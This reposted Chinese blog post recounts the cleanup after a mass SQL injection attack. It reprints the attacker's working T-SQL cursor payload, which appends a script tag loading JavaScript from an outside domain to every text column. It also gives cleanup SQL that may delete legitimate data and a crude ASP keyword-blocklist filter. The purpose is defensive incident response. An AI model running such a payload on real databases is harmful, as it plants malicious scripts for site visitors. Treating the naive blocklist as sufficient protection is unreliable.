最近客戶的網站被 注入了<script src=http://www.nmidahena.com/1.js></script>。整個網站的數據庫基本上都在內容的后面加入了 <script src=http://www.nmidahena.com/1.js></script>
經分析,網站不止一次被注入。
在網上查詢 了一些資料,注入的SQL語句是這樣的:
===============================================
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR
FOR
select a.name, b.name
from sysobjects a,syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
( 'update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,['
+ @C + ']))+''<script src=http://www.nmidahena.com/1.js></script>''' )
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
==============================================
數據庫里的varchar,nvarchar,ntext這些類型的字段基本上都被感染。
更無恥的就是,如果字段的大小過小,他會把原有的內容刪掉。而保存完整的<script src=http://www.nmidahena.com/1.js></script>。很多數據都被破壞了。
花了一天的功夫終于寫出來清除這些小尾巴的方法:
===============================================
DECLARE @T varchar(255), @C varchar(255)
DECLARE Table_Cursor CURSOR
FOR
select a.name, b.name
from sysobjects a,syscolumns b
where a.id = b.id
and a.xtype = 'u'
and ( b.xtype = 99
or b.xtype = 35
or b.xtype = 231
or b.xtype = 167
)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE( @@FETCH_STATUS = 0 )
BEGIN
exec
('update [' + @T + '] set [' + @C + '] = ( case when
( CHARINDEX(''<script'', [' + @C + '])>0)
then
left( rtrim(convert(nvarchar,['+ @C + '])), CHARINDEX(''<script'', ['+ @C + '] )-1)
else
[' + @C + ']
end )
')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
==============================================
這里CHARINDEX(''<script'', ['+ @C + '] ) 是因為有很多字段被多次感染,成了<script src=<script src=http://www.nmidahena.com/1.js></script>這樣的內容。所以以<script 為標志,全部刪除。這樣可能會刪除一些合法的,但是沒辦法。。。如果要清理干凈。必須得這么做。
做完以為,對網站進行一下SQL的重點過濾:
==========FilterSqlAttack.asp==============
<%
Call FilterSqlAttack()
Sub FilterSqlAttack()
dim sql_leach,sql_leach_0,Sql_DATA,SQL_Get,Sql_Post
sql_leach = "and,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,declare"
sql_leach_0 = split(sql_leach,",")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(LCase(Request.QueryString(SQL_Get)),sql_leach_0(SQL_Data))>0 Then
Response.Write "請不要嘗試進行SQL注入!"
Response.end
end if
next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(LCase(Request.Form(Sql_Post)),sql_leach_0(SQL_Data))>0 Then
Response.Write "請不要嘗試進行SQL注入!"
Response.end
end if
next
next
end if
If Request.Cookies<>"" Then
For Each Sql_Post In Request.Cookies
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(LCase(Request.Cookies(Sql_Post)),sql_leach_0(SQL_Data))>0 Then
Response.Write "含有非法字符,已記錄IP"
Response.end
end if
next
next
end if
End Sub
%>
==========================
本文來自CSDN博客,轉載請標明出處:http://blog.csdn.net/RyanGT/archive/2008/04/08/2260742.aspx
400 186 1886
